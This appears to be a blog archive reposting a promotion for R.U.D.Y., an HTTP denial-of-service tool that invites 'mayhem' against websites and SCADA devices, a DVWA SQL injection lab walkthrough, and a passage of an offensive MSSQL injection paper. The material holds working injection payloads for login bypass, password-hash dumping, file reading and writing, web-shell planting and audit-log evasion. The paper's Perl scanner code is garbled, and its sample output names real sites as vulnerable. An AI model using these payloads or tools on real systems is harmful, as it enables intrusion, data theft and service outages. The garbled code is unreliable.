Penetration Engineer عدلی

Universal HTTP DoS - Are You Dead Yet?

2010-11-28T18:00:00.000-08:00

A generic flaw in the way HTTP works?
Now that's the kinda stuff I always like to hear about.
Oh, you mean to tell me that once again Web Application Firewalls cannot stop this attack?
Allow me to put on my "surprised" face again. Of course WAF cannot handle this. WAF do not really detect traffic anomalies. WAF simply do what they were programmed to do - detect pre-defined white/black list patterns.
Some boffins talked about this attack at OWASP:

http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf

So trivial we all wonder why nobody's thought of this prior to late 2010...
We simply find a nice web form to flood with never-ending POST values.
Add in connection concurrence in the tens-to-hundreds scale per client, et voilà:
Application layer Denial-of-Service attack.
At the time of this writing, I could not find any efficient PoC code. So I wrote my own.
Introducing: "R-U-Dead-Yet" or R.U.D.Y.
Distributed or not, this baby knocks down websites and web-enabled devices.
Apache? No problem for R.U.D.Y. IIS escaped the SlowLoris attack? it won't escape this time. Think you're ok cuz you wrote in ASP.NET / Java / PHP / whatever? Guess again. This attack is universal!
All you need could be an antique machine running Linux (tested and verified with Ubuntu).
With built-in detection of web forms and form fields suitable for attack, and unattended execution using pre-defined configuration files, this tool is simple enough for anyone to use.
I know not of any firewall / IPS, including WAF, that will currently cope with this attack.
And of course, as cyber warfare is our current hype, SCADA systems using web interfaces can also be attacked, according to the researchers behind the idea. Considering automatic discovery of Web-facing SCADA equipment using the SHODAN search engine, this could be major...
So without much further ado, let the mayhem, anarchy and general fun begin!

Download R-U-Dead-Yet at:

http://code.google.com/p/r-u-dead-yet/

Reference:
http://chaptersinwebsecurity.blogspot.com/2010/11/universal-http-dos-are-you-dead-yet.html

SQL Injection Walkthrough (DVWA)

2010-10-09T10:21:00.000-07:00

(A PDF VERSION CAN BE DOWNLOADED HERE)

Intro:

The goal of this paper is to help explain and demonstrate some of the dangers of SQL injection. It is in no way complete, and it is far from comprehensive. If you have any comments, suggestions, corrections, etc…please send them to Trenton@HackYeah.com

I have always believed that the best way to learn is to do. For this reason, I have tried to provide the reader a reference to use when practicing SQL injection. You are highly encouraged to follow along and try the following examples as you read.

For the rest of this tutorial we will use Damn Vulnerable Web App (DVWA) as our practice grounds. The sources listed at the end of this paper contains both a link to the DVWA download, and to the official install instructions. Do not install DVWA in a production environment. It could cause your host to be compromised (by the techniques listed below, among others).

I have used the XAMPP server package (Apache with MySQL) in a Windows environment for this walkthrough. This can be done with other web servers, or OS types, but some of the injections will need to be tailored accordingly.

Injection Intro:

The following definition has been borrowed from Wikipedia: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed … SQL injection attacks are also known as SQL insertion attacks.

Rephrased, this means that we may be able to use special input to trick the SQL server to do what we want it to do.

Formatting:The following injections can be split into three parts. For the sake of simplicity we will call these three parts the injection prefix, expression, and suffix. For the remainder of this paper I will refer to these three parts, when placed together, as the injection phrase. This will be redin color – it is what you will insert into the text box. The whole query (the original SQL query plus our injection phrase) will be referred to as the SQL injection query. I have shown the whole query, so that you can better understand what the SQL server is processing after we insert the injection phrase.

The “injection prefix” is a modification of an expected query that attempts to break us free of the expected input and place the rest of our input directly into the SQL query.

The “injection expression” contains the specific query used to gain information or execute code.

The “injection suffix” will attempt to manage the formatting of the query to prevent unwanted syntax errors. This is usually done by commenting out the rest of the query. This task can also be accomplished by creating proper SQL syntax.

SQL INJECTION WALKTHROUGH WITH DVWA

Once you have XAMPP running correctly. Simply place the DVWA folder into your server’s root web directory (In a test environment only!). In this tutorial, DVWA will be located at c:\xampp\htdocs\dvwa.

Add the database login name and password to the DVWA configuration file located at …\dvwa\config\config.inc.php. With any web browser, go to http://127.0.0.1/dvwa. You will be prompt to “setup the database”. Click the noted link. If all goes well DVWA should note that setup was successful. Click on the “DVWA Security” tab. You will be prompted to insert a username and password. Log in withadmin as the username and password as the password (They don’t call it DVWA for nothing). Set the security to low, and click submit. Click on the “SQL Injection” tab…we are now ready to go.

Although you can attack the server from the server (127.0.0.1 – localhost), If you want to use another computer to attack this vulnerable host, you will need to modify …\dvwa\.htaccess to include your network address. This helps prevent DVWA from being abused from outsiders.

Insert the text from the following examples noted in red into the User ID box, and then click Submit to see what happens.

Check expected results:

SELECT first_name, last_name FROM users WHERE user_id = ’1‘”
- Results:
ID:1 First name: admin
Surname: admin
- Note that we could cycle through each user to find out who, and how many there are. Something like this is an obvious information disclosure vulnerability.

Check for handling of quotes:

SELECT first_name, last_name FROM users WHERE user_id = ‘O’Malley‘
- We will use something that looks benign to check for quote handling errors
- Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘Malley” at line 1
- We can see that everything after the single quote is being treated as a SQL request.

Check the results of an OR True statement – First Try:

SELECT first_name, last_name FROM users WHERE user_id = ’ a’ OR 1=1;–‘”
- Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘–” at line 1
- The -– didn’t work as hoped. Ideally (for the attacker) this will cause the entire following query to be treated as a comment. Note the extra single quote at the end of the returned error. It must be expecting the single quote from user_id=’ to be closed. Let’s try something else…

Check the results of an OR True statement – Second Try:

SELECT first_name, last_name FROM users WHERE user_id = ‘a’ OR ”=’‘”
- Result: ID: a’ OR ”=’
  First name: admin
  Surname: admin

ID: a’ OR ”=’
First name: Gordon
Surname: Brown

ID: a’ OR ”=’
First name: Hack
Surname: Me

ID: a’ OR ”=’
First name: Pablo
Surname: Picasso

ID: a’ OR ”=’
First name: bob
Surname: smith

- For a lookup like this, one would only expect the first response to be displayed. If you look at the DVWA source code (Click the View Source tab in DVWA), you can see that a loop is created to cycle through each returned row. This is a bad idea because the expected input should have an expected output of only one result – Why they code this page to display more than one result is beyond be. I guess that’s why they call it DVWA.
- Note how we used AND ‘’=’ at the end of our injection. This takes care of the final single quote by making a statement that is always true‘’=’’
SELECT first_name, last_name FROM users WHERE user_id =’a’ OR ‘x’='x’;#‘”
- Here is an alternative injection string that will work. It seems that an injection suffix of ;# will comment out the following SQL, thus creating proper syntax within the SQL phrase. We will use this for our suffix for most of the following injection strings.

Find the number of returned columns:

SELECT first_name, last_name FROM users WHERE user_id = ’a’ ORDER BY 1;#‘“
- Result: Nothing….this means that there is at least one column returned from the original SELECT statement.
SELECT first_name, last_name FROM users WHERE user_id = ’a’ ORDER BY 2;#‘“
- Result: Nothing…this means that there are at least two columns returned from the original SELECT statement.
SELECT first_name, last_name FROM users WHERE user_id = ’a’ ORDER BY 3;#‘“
- Result: Unknown column ’3′ in ‘order clause’
  - This means that there are only two columns returned by the original SELECT statement (In this case, first_name and last_name – We don’t usually get to see the text in blue. We can use these injection phrases to gain more information about the original SQL query’s structure.) If we use UNION to return other results, we will need to make sure that the number of columns is equal in both the original SQL query and our Injected UNION Phrase.

Find field names – First Try:

SELECT first_name, last_name FROM users WHERE user_id = ’a’ OR firstname IS NULL;#‘”
- Result: Unknown column ‘firstname’ in ‘where clause’
- This is good….we now know that there is not a column named firstname. Let’s take a few more guesses…

SELECT first_name, last_name FROM users WHERE user_id = ‘a’ OR firstname = ”=’‘”
- This is an alternate way to do this. It should also work…there should still be an error if the column does not exist.

Find field names – Second Try:

SELECT first_name, last_name FROM users WHERE user_id = ‘a’ OR first_name IS NULL;#‘”
- Result: Nothing
- …This is good. That means there are no errors, thus there is a field named first_name. Nothing is actually returned because first_name is not NULL, IE…it has something in it.

SELECT first_name, last_name FROM users WHERE user_id = ’a’ OR first_name = ”=’‘”
- The alternate will not error out if the column name is correct, but unlike above, this should print the expected results for the first row (because of the loop noted above, it will actually display all rows).
- Try a few other fields….not all of these will work, but give them a try and see what happens:
  - user_id
  - lastname
  - last_name
  - image
  - links
  - link
  - avatar
  - pass
  - password
  - user

Finding user names – LIKE:

Let’s say that the page is a bit more secure and will only list one result at a time. If we need to know a username (and we can’t just insert a sequential number), how do we get more names? With LIKE or course. (Here we will assume that first_name is what we are trying to find).

SELECT first_name, last_name FROM users WHERE user_id = ‘a’ OR first_name LIKE ‘%P%’;#‘”

Using this same technique, it may be possible to find the value of other fields (passwords, email addresses…etc)?

SELECT first_name, last_name FROM users WHERE user_id = ‘a’ OR first_name=’Pablo’ AND password LIKE ‘%a%’;#‘”

Finding the table name – Take a guess:

SELECT first_name, last_name FROM users WHERE user_id = ’a’ OR test.user_id IS NOT NULL;#’”
- Result: Unknown column ‘test.user_id’ in ‘where clause’
- We are using the tablename.columnname format to help guess the table name. We must use a known column name (see Find Field Names) for this to work properly. If we guess an incorrect table name we will get an error. If, however, we guessed the correct table name, the query should not have an error.
- Try a table name of users
SELECT first_name, last_name FROM users WHERE user_id =1′ AND 1=(SELECT COUNT(*) FROM tablenames);#‘”;
- This is an alternative way to brute force a table name. This will help us find any table name in the database. We can use the above method to help determine if any table that is found is the one we are currently working with.

Find the database name – LIKE:

SELECT first_name, last_name FROM users WHERE user_id = ’a’ OR database() LIKE ‘%A%’;#“
- The database() function will help us find the database name. We can use the LIKE clause to help determine the name. The ‘%’ is the wildcard character. Means 0 or more characters of any value, so %A% checks to see if the database name contains the letter A. ‘_‘ represents any single character, so you can determine the length of the table name by incrementing the amount of _’s until you get a response. Try the following:
  - a’ OR database() LIKE ‘__’;#
  - a’ OR database() LIKE ‘____’;#
  - a’ OR database() LIKE ‘%W%’;#
  - a’ OR database() LIKE ‘D%’;#
  - a’ OR database() LIKE ‘D%’;#
  - a’ OR database() LIKE ‘%Z%’;#
  - a’ OR database() LIKE ‘_v_A’;#

Find the table names – LIKE:

SELECT first_name, last_name FROM users WHERE user_id =‘a’ UNION SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema LIKE ‘%dv%‘”
- SQL-92 Standardization (ISO 9075) includes the information_schemadatabase. This holds information on other databases, tables, users, etc…. Information_schema.tables, is a list of database names (table_schema) and table names (table_name). Fortunately for us, we can request both of these at once because the original query also requested two columns. By manipulating the WHERE table_name LIKE phrase, we can find the names of various tables. This is not necessary for this exercise because…
SELECT first_name, last_name FROM users WHERE user_id =‘a’ UNION SELECT table_schema, table_name FROM information_schema.tables;#‘”
- The loop will display all of the returned rows – not just the first one. By omitting the WHERE/LIKE portion, we are able to see all of the results.

Find the current SQL Version

SELECT first_name, last_name FROM users WHERE user_id = ‘a’ UNION ALL SELECT 1, @@version;#‘”
- Result: ID: a’ UNION ALL SELECT 1, @@version;#
  First name: 1
  Surname: 5.1.41
- Here we can see that the current version number is 5.1.41.

Find the current database user:

SELECT first_name, last_name FROM users WHERE user_id = ‘a’ UNION ALL SELECT system_user(),user();#‘”
- Result: ID: a’ UNION ALL SELECT 1, user();#
  First name: root@localhost
  Surname: root@localhost

List Password Hashes:

SELECT first_name, last_name FROM users WHERE user_id =‘1′ UNION ALL SELECT user, password FROM mysql.user; — priv;#’“
- This will hopefully display a password hash that can then be cracked with John the Ripper or other password crackers. This could be usefully for many things. If this works, check to see if they have a database management program such as PHPmyAdmin – log in with what you found (and cracked).

Reading arbitrary files:

SELECT first_name, last_name FROM users WHERE user_id = ’‘ UNION ALL SELECT load_file(‘C:\\xampp\\htdocs\\dvwa\\.htaccess’), ’1‘”
- This should show us the .htaccess file. We could of course, read any file that the SQL server has read rights to. You could check for .htpasswd, or some other file that contains sensitive information. PHP files that access a SQL database will often have the database password (likely in plain text) listed in the file. SQL injection will allow us to view the .php file without the php first being interpreted by the server.

SELECT first_name, last_name FROM users WHERE user_id = ’ ‘ UNION ALL SELECT load_file(‘C:\\xampp\\htdocs\\dvwa\\config\\config.inc.php’), ’1‘”
- This works without error, but there is nothing printed to the screen. If you view the page source however, you should find something interesting.

Writing arbitrary files:

SELECT first_name, last_name FROM users WHERE user_id = ‘‘UNION SELECT ‘test’, ’123′ INTO OUTFILE ‘testing1.txt‘”
- The command will likely return a few warnings – look closely, these could contain file paths that give us an idea of the web root location on the server…If all goes well, you should see a file named testing1.txt in the SQL data path. (If you are using Xampp on Windows, it should be something like C:\xampp\mysql\data\dvwa\testing1.txt). Let’s try to write a file accessible to the web.
SELECT first_name, last_name FROM users WHERE user_id = ’‘UNION SELECT ‘test’, ’123′ INTO OUTFILE ‘c:\\xampp\\htdocs\\testing2.txt‘“
- Now, point your web browser to “http://[web root]/testing2.txt”. What do you see…..it’s our OUTFILE! This means that the attacker has the ability to change existing web pages via SQL injection. This means, you can add your own pages to the site. It may also mean that we can execute remote code…

Remote Code execution:

SELECT first_name, last_name FROM users WHERE user_id = ’‘ UNION SELECT ”, ‘’ INTO OUTFILE ‘C:\\xampp\\htdocs\\dvwa\\shell.php’;#‘”
- Now point your browser to http://[web root]/dvwa/shell.php?cmd=dir. Game over! We have just run a command on the remote server. From here we could download and run files (backdoor, keylogger, etc…), change system settings, add system users, etc…
- Note that if you try and change the directory, it will not remember the next time you run the command. Each time it is a new process. To find out what directory your are in, use the remote shell to execute the command ‘echo %25CD%25 ‘

Getting around escaped characters:

So far we have been using DVWA on the low security setting. Click on the “DVWA Security” tab on the left side of the DVWA webpage. Change the settings to medium and click Submit. Go back to “SQL Injeciton” and try an injection phrase that checks for the handling of quotes.

SELECT first_name, last_name FROM users WHERE user_id = ’ O’Malley’“
- Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’Malley‘ at line 1
- Note that there is now a \ in front of our single quote. In SQL a \ will cause certain characters be taken literally. Instead of interpreting the single quote as an escape from “user_id=’“, it is interpreted as text.
SELECT first_name, last_name FROM users WHERE user_id = ’ 1 OR 1=1‘“
- As we can see, if we avoid certain characters, we can still trick the server into running our injection phrase. Play around with the previously mentioned injection phrases – but first remove any quotes. Many of the above injection phrases will still work without quotes.

Protect Yourself from SQL Injection:

Hopefully this walkthrough has shown how important it is to protect your site against SQL injection. NEVER take user input and place it directly into a SQL query. Always sanitize user input. Watch for characters like ‘,”,_,%,\x00,\n,\r,\, and \x1a. If possible create a whitelist of what characters are acceptable, and don’t make it contain any more than you need. Limit user input by length (and make sure the user can’t send data greater than expected by modifying the form’s HTML). If only one result is to be expected – return only one result. If you are using PHP and MySQL, it is often best to assign the input to a variable, and then pass it through the stripslashes() and then the mysql_real_escape_string()function. Once this is done, SQL injection will much more difficult – for a query like we were working with, it should become impossible. Avoid displaying server errors when possible. Always make sure to use a least-privileged database account.Test…test….test. There are many automated SQL Injection tools. I recommend using these tools to test your code. Having a professional code audit is never a bad idea either.

Sources

To give credit where it is due – The following sites were referenced while creating this walkthrough. I would highly recommend checking them out:

http://www.apachefriends.org/en/xampp.html – The XAMPP site
http://sourceforge.net/projects/dvwa/ – Download location for DVWA
http://www.youtube.com/watch?v=GzIj07jt8rM – The official DVWA install video, showing how to install DVWA with XAMPP.
http://en.wikipedia.org/wiki/SQL_Injection
http://unixwiz.net/techtips/sql-injection.html
http://sqlzoo.net/hack/24table.htm
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/
http://www.greensql.net/publications/backdoor-webserver-using-mysql-sql-injection
http://w3schools.com/sql/default.asp
http://msdn.microsoft.com/en-us/library/ff648339.asp

Reference:

http://www.hackyeah.com/2010/05/hack-yeah-sql-injection-walkthrough-dvwa/

Dating is rough at the transport layer

2010-07-05T00:18:00.000-07:00

http://blog.ksplice.com/2010/04/dating-is-rough-at-the-transport-layer/#comments

Full MSSQL Injection PWNage

2010-06-02T06:52:00.001-07:00

|=--------------------------------------------------------------------=|
  |=----------------=[  Full MSSQL Injection PWNage  ]=-----------------=|
  |=-----------------------=[ 28 January 2009 ]=------------------------=|
  |=---------------------=[  By CWH Underground  ]=---------------------=|
  |=--------------------------------------------------------------------=|
    

######
 Info
######

Title : Full MSSQL Injection PWNage
Author : ZeQ3uL && JabAv0C
Team    : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-01-28


##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Know the Basic of SQL injection

 [0x01a] - Introduction to SQL Injection Attack
 [0x01b] - How to Test sites that are Vulnerable in SQL Injection
 [0x01c] - Bypass Authentication with SQL Injection
 [0x01d] - Audit Log Evasion
 [0x01e] - (Perl Script) SQL-Google searching vulnerable sites 

  [0x02] - MSSQL Normal SQL Injection Attack
 
 [0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
 [0x02b] - ODBC Error Message Attack with "CONVERT"
 [0x02c] - MSSQL Injection with UNION Attack
 [0x02d] - MSSQL Injection in Web Services (SOAP Injection)

  [0x03] - MSSQL Blind SQL Injection Attack
 
 [0x03a] - How to Test sites that are Vulnerable in Blind SQL Injection
 [0x03b] - Determine data through Blind SQL Injection
 [0x03c] - Exploit Query for get Table name 
 [0x03d] - Exploit Query for get Column name

  [0x04] - More Dangerous SQL Injection Attack

 [0x04a] - Dangerous from Extended Stored Procedures
 [0x04b] - Advanced SQL Injection Techniques
 [0x04c] - Mass MSSQL Injection Worms

  [0x05] - MSSQL Injection Cheat Sheet

  [0x06] - SQL Injection Countermeasures

  [0x07] - References

  [0x08] - Greetz To


#######################
 [0x00] - Introduction
#######################

 Welcome reader, this paper is a short attempt at documenting a practical technique 
we have been working on. This papers will guide about technique that allows the attackers 
(us) gaining access into the process of exploiting a website via SQL Injection Techniques
that we focused on MSSQL only

 This paper is divided into 8 sections but only from section 0x01 to 0x06
are about technical information.

 Section 0x01, we talk about basic knowledge of SQL injection vulnverabilities which
are classified into two types, normal and blind. Section 0x02, we give a detail of each way 
attacking through SQL injection. Section 0x03, we explain the way to enumerate data through 
blind sql injection technique. Section 0x04, we show more dangerous approaches which can occur 
through SQL injection vulnerabilities. Section 0x05, we collect MSSQL queries in several purposes.
Section 0x06, we offer some tips in order to prevent the system from SQL injection attack.


##########################################
 [0x01] - Know the Basic of SQL injection
##########################################
 
 SQL injection vulnerabilities occur when the database server can be made to execute arbitrary SQL 
(Structured Query Language) commands. Typically executed through the web application front end (use interface,
form, etc.), the attack involves entering malformed or unexpected SQL statements which result in unauthorized
execution of SQL commands on the database server.  


 ++++++++++++++++++++++++++++++++++++++++++++++++
  [0x01a] - Introduction to SQL Injection Attack
 ++++++++++++++++++++++++++++++++++++++++++++++++
 
  SQL injection attacks occur when malicious SQL commands are injected into a predefined SQL query 
 in order to alter the outcome of the query. Take the example of an application that requests a user id 
 for authentication. The application adds this user ID to a predefined SQL query to perform authentication. 
 
  However, if instead of providing a valid user name the attacker inputs a specialized SQL command 
 that forces the termination of the predefined SQL query and forces the execution of a new SQL query. In this 
 way the attacker can execute any SQL command on the host system without even needing to log in. 
 
  A successful SQL injection exploit can read sensitive data from the database, modify database data 
 (Insert/Update/Delete), execute administration operations on the database (such shutdown the DBMS), recover 
 the content of a given file present on the DBMS filesystem and in some cases issue commands to the operating system. 
 
  An application is vulnerable to SQL injection attack when:
   - User input is incorrectly filtered for string literal escape characters embedded in SQL statements.
   - User input is either not restricted ? e.g. through strong typing - and thereby can be made to execute
     in an unexpected manner
 
  SQL Injection always occur in application that needs to talk to a Database include:
   - Authentication forms (Login Pages)
   - Search forms
   - E-Commerce sites
   - Forum / Webboard
   - Content Manage System (CMS's that use DB),Such as: 
    Joomla Components (http://www.milw0rm.com/search.php?dong=joomla)
    Mambo Components (http://www.milw0rm.com/search.php?dong=mambo)
    Wordpress Plugin (http://www.milw0rm.com/search.php?dong=wordpress)

 
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x01b] - How to Test sites that are vulnerable in SQL Injection
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
  We must make a list of all input fields whose values could be used in crafting a SQL query, 
 including the hidden fields of POST requests and then test them separately, trying to interfere with 
 the query and to generate an error. The very first test usually consists of adding a single quote (') 
 , double quote ("") or a semicolon (;) to the field under test. 
 
 [Simple URL] http://www.example.com/news.asp?id=10
 [Test SQLi]  http://www.example.com/news.asp?id=10'

  It's vulnerable in SQL injection,If the output some error like this:
 
 [HTTP Response]-----------------------------------------------------------------------------
 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
 [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the 
 character string ''.
 /news.asp, line 52
 [End HTTP Response]-------------------------------------------------------------------------

  Next solution, Use "OR/AND" Operation for testing SQL injection vulnerability:
 
  If contains is the different as original URL that dump all data 
 from database, It's vulnerable in SQL injection.

 [Simple URL] http://www.example.com/news.asp?id=2

 [output]------------------------------------------------------------------------------------
 News: 2
 Details: Preventing blind SQL injection attacks, Most security professionals know ... 
 [End Output]--------------------------------------------------------------------------------


 [Test SQLi] http://www.example.com/news.asp?id=2' or '1'='1

 [output]------------------------------------------------------------------------------------
 News: 1
 Details: SQL injection attack infects hundreds of thousands of websites ...

 News: 2
 Details: Preventing blind SQL injection attacks, Most security professionals know ... 
 
 News: 3
 Details: Mass SQL injection, There's another round of mass SQL injections going on which has infected ...
 
 News: 4
 Details: New Botnet Malware Spreading SQL injection attack tool ...
 [End Output]--------------------------------------------------------------------------------

  That's Great !! Can you see something different from original URL ? (It's Vuln in SQL Injection Attacks),
 It's return all query from DB, Why ??

 [ASP_code]
 var sql = "SELECT * FROM news WHERE id = '" + getid +"'";
 [End ASP_code]

 [Final query //id=2]
 SELECT * FROM news WHERE id = '2'  // It's will return News 2
 [End id=2]

 [Final query //id=2' or 'a'='a]   // Testing SQLi Vuln
 SELECT * FROM news WHERE id = '2' or 'a'='a' // It's include ' or 'a'='a into SQL statement and the condition is TRUE,
       //  So It will return all news (id=1,2,3,...)
 [End id=2' or 'a'='a]



 ++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x01c] - Bypass Authentication with SQL Injection
 ++++++++++++++++++++++++++++++++++++++++++++++++++++

  This basic technique for "bypass Login" when application use DB to checking authentication.
 However, an attacker may possibly bypass this check with SQL injection.
 
 [Example scripts]

 +-----------------------------+
 |   ' or 1=1 --       |
 |   a' or 1=1 --       |
 |   " or 1=1 --       |
 |   a" or 1=1 --       |
 |   ' or 1=1 #       |
 |   " or 1=1 #       |
 |   or 1=1 --       |
 |   ' or 'x'='x       |
 |   " or "x"="x       |
 |   ') or ('x'='x       |
 |   ") or ("x"="x       |
 | ' or username LIKE '%admin% |
 +-----------------------------+
 |      USERNAME:  ' or 1/*    |
 |      PASSWORD:  */ =1 --    |
 +-----------------------------+
 |  USERNAME: admin' or 'a'='a |
 |  PASSWORD: '#        |
 +-----------------------------+

 [Login ASP_code]----------------------------------------------------------------------------
 var sql = "SELECT * FROM users WHERE username = '" + formusr + "' AND password ='" + formpwd + "'";
 [End Login ASP_code]------------------------------------------------------------------------

  When we input something like this:
  formusr = admin
  formpwd = ' or 'a='a

 [SQL Query]---------------------------------------------------------------------------------
 SELECT * FROM users WHERE username = 'admin' AND password = '' or 'a'='a'
 [End Code]----------------------------------------------------------------------------------

  This SQL condition is TRUE and bypass login process, So you don't need admin's password. (Just use ' or 'a'='a)

  If we input something like this
  formusr = ' or 1=1 -- 
  formpwd = anything
 
 [SQL Query]---------------------------------------------------------------------------------
 SELECT * FROM users WHERE username = '' or 1=1 -- AND password = 'anything'
 [End Code]----------------------------------------------------------------------------------

  ** Note **

  --  is comment operator of MSSQL DB used to comment out everything following this operator.
  /*Comment*/ Inline comment, Comments out rest of the query by not closing them / Bypass blacklisting.
    
    DROP/*comment*/sampletable 
    DR/**/OP/*bypass blacklisting*/sampletable 
    SELECT/*avoid-spaces*/password/**/FROM/**/Members


  If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then
 you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash 
 of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
  
  formusr = admin 
  formpwd = pass ' AND 1=2 UNION ALL SELECT 'admin', '1a1dc91c907325c69271ddf0c944bc72

 1a1dc91c907325c69271ddf0c944bc72 = MD(pass)

 +++++++++++++++++++++++++++++
  [0x01d] - Audit Log Evasion
 +++++++++++++++++++++++++++++

  When we injection some code with SQLi Techniques, All of the SQL queries can be logged and admin can know what's happen ?
 The technique for evade logging, We use "sp_password"

  formusr = ' or 1=1 -- sp_password
  formpwd = anything

  SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries 
 it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible).

 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x01e] - (Perl Script) SQL-Google searching vulnerable sites
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
  The Good way to searching sites that have SQL injection vulnerability is "Google" 
 (That powerful to use every search engines to searching with IRCbots). We developed simple Perl script for
 searching SQL injection holes (MSSQL, Mysql, MS Access, Oracle) name "SQL-Google Search":

 [code]-----------------------------------------------------------------------------------

 #!/usr/bin/perl
 use LWP::Simple;
 use LWP::UserAgent;
 use HTTP::Request;
 my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } 
 print "+++++++++++++++++++++++++++++++\n";
 print "+     SQL - Google Search     +\n";
 print "+       CWH Underground       +\n";
 print "+++++++++++++++++++++++++++++++\n\n";
 print "Insert Dork:";
 chomp( my $dork =  );
 print "Total Query Pages (10 Links/Pages) :";
 chomp( my $page =  );
 print "\n[+] Result:\n\n";
 for($start = 0;$start != $page*10;$start += 10)
 { 
 $t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
     $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
     $ua->timeout(10);
     $ua->env_proxy;
     $response = $ua->get($t);
     if ($response->is_success)
     {
         $c = $response->content;
         @stuff = split(/new(agent => 'Mozilla 5.2');
   $ua->timeout(10);
   $ua->env_proxy;
   $response = $ua->get($out);
   $error = $response->content();
   if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
    {print "$out => Could be Vulnerable in MySQL Injection!!\n";}
   elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
    {print "$out => Could be Vulnerable in MS Access Injection!!\n";}
   elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
    {print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
   elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
    {print "$out => Could be Vulnerable in Oracle Injection!!\n";}
      }
  }
     }
        }

 [End code]----------------------------------------------------------------------------------
 
 [output]------------------------------------------------------------------------------------
 
 +++++++++++++++++++++++++++++++
 +     SQL - Google Search     +
 +       CWH Underground       +
 +++++++++++++++++++++++++++++++

 Insert Dork:index.asp?sid=
 Total Query Pages (10 Links/Pages) :5

 [+] Result:

 http://www.ris.org.uk/index.asp?sid=7&mid=5' => Could be Vulnerable in MSSQL Injection!!
 http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307' => Could be Vulnerable in MSSQL Injection!!
 http://www.ilri.org/research/Index.asp?SID=4' => Could be Vulnerable in MSSQL Injection!!
 
 [End output]--------------------------------------------------------------------------------


############################################
 [0x02] - MSSQL Normal SQL Injection Attack
############################################

 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  
  We can use information from error message produced by the MS SQL Server to get almost any data we want. 
 
 - "GROUP BY" is a microsoft sql server command used to group output of particular sql query.
 - "HAVING" is a command used to specify a search condition for a group or an aggregate. 
   this command is always used with "GROUP BY" otherwise the error will return.

  As the operation of these two commands, we can take advantage of them in order to 
 obtain particular table name and all column names of this table. We will explain you by using an example.

  First, The target has a table called "news" and in news, there are three columns, which are news_id, news_author and news_detail.
 
 The vulnerable page is http://www.example.com/page.asp?id=1
 The query in this page is something like 

  [Query]-----------------------------------------------------------------------------
  var query = "SELECT * FROM news WHERE news_id= '" + column+ "'";
  [End query]-------------------------------------------------------------------------

 So, we can inject HAVING command in order to observe returned error
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1' HAVING 1=1--
  [End SQLi]--------------------------------------------------------------------------

 The query will be 

  SELECT * FROM news WHERE news_id='1' HAVING 1=1--'

 We will get the error as following:
  
  ------------------------------------------------------------------------------------
  Microsoft OLE DB Provider for SQL Server error '80040e14'
  [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in 
  the select list because it is not contained in an aggreate function and there is no GROUP BY clause. 
  ------------------------------------------------------------------------------------

 In this error, we know table name = "news", used in this page and 
 one column name = "news_id", contained in particular table.
 
 The error is originate from using HAVING command without GROUP BY command. 
 Moreover, we can get the other column names by using combination of GROUP BY and HAVING command.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1' GROUP BY news.news_id HAVING 1=1--
  [End SQLi]--------------------------------------------------------------------------

 The query will be

  SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id HAVING 1=1--'

 We will get the error
  
  ------------------------------------------------------------------------------------
  Microsoft OLE DB Provider for SQL Server error '80040e14'
  [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_author' is invalid in 
  the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
  ------------------------------------------------------------------------------------

 Now, we know the second column name of table1 = "news_author". The third column name can be obtained 
 by adding the second column name in the previous query
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author HAVING 1=1--
  [End SQLi]--------------------------------------------------------------------------

 The query will be

  SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author HAVING 1=1--'

 The request will generate following error
  
  ------------------------------------------------------------------------------------
  Microsoft OLE DB Provider for SQL Server error '80040e14'
  [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in 
